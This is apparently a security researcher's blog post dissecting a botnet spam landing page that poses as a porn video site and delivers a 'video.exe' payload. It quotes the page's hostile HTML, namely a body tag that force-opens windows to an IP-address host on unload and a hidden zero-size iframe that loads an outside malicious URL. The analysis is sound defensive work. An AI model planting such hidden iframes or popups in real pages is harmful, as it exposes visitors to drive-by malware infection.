This is the oldest botnet spam landing page I have found so far, because I haven't pushed the datamining back to June yet. I see this one on July 6 and 7. Note to the people finding this page by Google: don't trust anything called "Porntube". You are exceedingly likely to be donating the use of your PC and DSL line to some really nice mafia guys if you click on anything called "Porntube".

Anyway, this page already shows most of the exploit elements still used in August, but attempts to look like a porn video page with comments. Of course, the video doesn't exist -- it's an executable called "video.exe" that's the payload of this scam.

The full page is here. Besides all the social-engineering techniques I've already documented elsewhere, this page tries to open a new window using Javascript on the body tag:

<body onbeforeunload="window.open('http://61.162.230.12/index.php');" onunload="window.open('http://61.162.230.12/index.php');" onclose="window.open('http://61.162.230.12/index.php');" id="mainbody">

Unfortunately, as I attempt to document this on August 16, that page doesn't return. (It might, eventually; I'm impatient.)

The same URL is the target of an invisible iframe.

And there's another invisible iframe here:

<iframe src="http://digitaltreath.info/cgi-bin/index.cgi?user90" style="display:none" width="0" height="0" frameborder="0"></iframe>

Digitaltreath.info has also been unplugged sometime in the last month. A pity. But no fear -- there are still many newer exploits to track down! And I have no doubt that the coming week will bring us more.